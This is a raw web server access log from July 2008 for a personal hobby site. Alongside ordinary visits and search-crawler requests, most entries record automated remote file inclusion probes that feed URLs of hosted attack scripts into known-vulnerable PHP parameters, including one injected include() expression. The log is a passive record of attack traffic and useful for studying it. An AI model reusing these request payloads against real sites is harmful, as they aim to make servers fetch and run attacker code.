65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [31/Jul/2008:01:19:17 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
85.214.59.54 - - [31/Jul/2008:01:19:53 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:01:19:54 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:01:19:54 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.246.46.184 - - [31/Jul/2008:01:20:57 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dj.caucasus.net/id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
216.246.46.184 - - [31/Jul/2008:01:20:57 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dj.caucasus.net/id.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
80.67.26.157 - - [31/Jul/2008:01:21:20 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:01:21:20 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:01:21:21 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:01:21:28 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:01:21:28 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
201.36.250.17 - - [31/Jul/2008:01:22:48 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
201.36.250.17 - - [31/Jul/2008:01:22:48 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
64.246.52.46 - - [31/Jul/2008:01:22:54 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:22:54 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:01:24:39 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:01:24:39 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:25:49 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:25:49 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
74.6.29.159 - - [31/Jul/2008:01:28:37 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [31/Jul/2008:01:28:38 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.166.92 - - [31/Jul/2008:01:30:12 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:01:30:14 -0500] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:01:30:15 -0500] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.6.18.231 - - [31/Jul/2008:01:30:24 -0500] "GET /?S=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.221 - - [31/Jul/2008:01:32:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [31/Jul/2008:01:32:18 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.255.60.6 - - [31/Jul/2008:01:32:34 -0500] "GET /logs//vwar/backup/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:01:32:35 -0500] "GET //vwar/backup/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
80.231.0.98 - - [31/Jul/2008:01:33:21 -0500] "GET /logs/index2.php?x=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
80.231.0.98 - - [31/Jul/2008:01:33:24 -0500] "GET /index2.php?x=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.246.52.46 - - [31/Jul/2008:01:36:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:36:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
213.33.84.163 - - [31/Jul/2008:01:36:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
213.33.84.163 - - [31/Jul/2008:01:36:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
64.246.52.46 - - [31/Jul/2008:01:37:01 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:37:01 -0500] "GET /lostpasswd.php?env[include_prefix]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
201.238.195.13 - - [31/Jul/2008:01:37:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.238.195.13 - - [31/Jul/2008:01:37:10 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
117.55.242.66 - - [31/Jul/2008:01:38:10 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:13 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:17 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:19 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:19 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:20 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
117.55.242.66 - - [31/Jul/2008:01:38:22 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008052519 CentOS/3.0b5-0.beta5.6.el5.centos Firefox/3.0b5"
74.53.240.146 - - [31/Jul/2008:01:38:56 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:01:38:56 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
94.136.160.61 - - [31/Jul/2008:01:39:02 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
94.136.160.61 - - [31/Jul/2008:01:39:03 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
62.149.18.4 - - [31/Jul/2008:01:40:00 -0500] "GET /logs/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
62.149.18.4 - - [31/Jul/2008:01:40:01 -0500] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
210.245.166.92 - - [31/Jul/2008:01:41:13 -0500] "GET /logs/?sourcedir=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:01:41:13 -0500] "GET /?sourcedir=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
69.64.48.146 - - [31/Jul/2008:01:42:03 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
69.64.48.146 - - [31/Jul/2008:01:42:03 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:43:08 -0500] "GET /logs//poc.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:43:08 -0500] "GET //poc.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:43:36 -0500] "GET /logs//poc.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:43:36 -0500] "GET //poc.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
62.149.18.4 - - [31/Jul/2008:01:45:23 -0500] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
62.112.193.46 - - [31/Jul/2008:01:46:12 -0500] "GET /logs/errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.112.193.46 - - [31/Jul/2008:01:46:12 -0500] "GET /errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.112.193.46 - - [31/Jul/2008:01:46:37 -0500] "GET /logs/errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.112.193.46 - - [31/Jul/2008:01:46:37 -0500] "GET /errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.246.52.46 - - [31/Jul/2008:01:46:50 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:46:50 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
62.112.193.46 - - [31/Jul/2008:01:47:24 -0500] "GET /errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:01:48:56 -0500] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:01:48:56 -0500] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
82.194.67.123 - - [31/Jul/2008:01:54:06 -0500] "GET /logs//index.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:54:06 -0500] "GET //index.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.246.52.46 - - [31/Jul/2008:01:54:15 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:54:15 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:54:15 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
82.194.67.123 - - [31/Jul/2008:01:54:21 -0500] "GET /logs//index.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:54:22 -0500] "GET //index.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.52.239.114 - - [31/Jul/2008:01:54:30 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
74.52.239.114 - - [31/Jul/2008:01:54:30 -0500] "GET //config/dbutil.bck.php?confdir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
207.44.234.103 - - [31/Jul/2008:01:55:12 -0500] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:01:55:12 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
222.122.52.79 - - [31/Jul/2008:01:55:58 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
222.122.52.79 - - [31/Jul/2008:01:55:58 -0500] "GET //Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
222.122.52.79 - - [31/Jul/2008:01:55:59 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
195.95.229.220 - - [31/Jul/2008:01:56:15 -0500] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.50.0.218 - - [31/Jul/2008:01:56:55 -0500] "GET /logs/?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.803"
212.50.0.218 - - [31/Jul/2008:01:56:55 -0500] "GET /?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
83.12.119.178 - - [31/Jul/2008:01:57:00 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:01:57:09 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:01:57:17 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
209.97.201.148 - - [31/Jul/2008:01:57:27 -0500] "GET /logs/?sourcedir=http://sujianto.com/load.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
209.97.201.148 - - [31/Jul/2008:01:57:27 -0500] "GET /?sourcedir=http://sujianto.com/load.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:01:57:35 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:35 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:36 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:37 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:42 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:42 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:43 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:01:57:44 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
148.202.29.8 - - [31/Jul/2008:01:57:52 -0500] "GET /logs/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
148.202.29.8 - - [31/Jul/2008:01:57:52 -0500] "GET /header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
209.97.201.148 - - [31/Jul/2008:01:58:27 -0500] "GET /?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
209.97.201.148 - - [31/Jul/2008:01:58:28 -0500] "GET /logs/?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
201.238.195.13 - - [31/Jul/2008:01:58:53 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
201.238.195.13 - - [31/Jul/2008:01:59:11 -0500] "GET /logs/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
201.238.195.13 - - [31/Jul/2008:01:59:11 -0500] "GET /?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
207.44.234.103 - - [31/Jul/2008:02:00:00 -0500] "GET /logs/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:00:00 -0500] "GET /logs/shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:00:01 -0500] "GET /login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:00:01 -0500] "GET /shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:00:05 -0500] "GET /logs/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:00:05 -0500] "GET /pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
69.64.48.146 - - [31/Jul/2008:02:00:15 -0500] "GET /logs/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
69.64.48.146 - - [31/Jul/2008:02:00:15 -0500] "GET /?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.95.229.220 - - [31/Jul/2008:02:00:26 -0500] "GET /logs/access_log.1214438400/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:02:00:26 -0500] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:02:00:26 -0500] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:00:29 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:00:29 -0500] "GET //config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
201.130.79.130 - - [31/Jul/2008:02:00:33 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:00:33 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:00:39 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:00:39 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
